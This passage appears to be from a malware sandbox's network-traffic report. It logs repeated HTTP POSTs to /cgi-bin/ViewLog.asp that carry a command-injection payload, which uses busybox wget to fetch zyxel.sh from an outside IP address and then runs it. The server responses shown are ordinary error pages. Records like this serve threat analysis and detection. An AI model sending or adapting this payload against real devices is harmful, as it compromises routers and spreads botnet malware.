73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72
                                                        Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-inter


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        943192.168.2.145465894.232.116.1838080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.318825006 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        944192.168.2.143832285.243.137.978080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.339986086 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:07.554884911 CET476INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 08:35:06 GMT
                                                        Server: Webs
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1;mode=block
                                                        Cache-Control: no-store
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        945192.168.2.145827262.122.207.208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.357680082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:07.589617014 CET536INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:10 GMT
                                                        Server:
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        946192.168.2.143714885.126.127.188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.360270023 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:07.599221945 CET111INHTTP/1.0 403 Access denied
                                                        Server: tinyproxy/1.8.2
                                                        Content-Type: text/html
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        947192.168.2.143577094.121.104.1258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.374046087 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        948192.168.2.144478094.120.165.2218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.374106884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        949192.168.2.145704894.120.153.238080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.374129057 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        950192.168.2.144340262.29.3.2198080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.375722885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        951192.168.2.144354631.136.226.98080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.543328047 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:08.164006948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:09.411997080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.971955061 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:17.091811895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:27.075220108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:46.786519051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        952192.168.2.143336831.136.224.1348080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.546101093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:08.196099043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:09.443929911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.971956015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:17.091813087 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:27.075220108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:48.834398031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        953192.168.2.143355294.122.238.08080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.620052099 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        954192.168.2.145275494.123.97.218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.622129917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        955192.168.2.143717685.126.127.188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.830326080 CET109INHTTP/1.0 400 Bad Request
                                                        Server: tinyproxy/1.8.2
                                                        Content-Type: text/html
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        956192.168.2.143549631.136.101.1858080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:08.117101908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
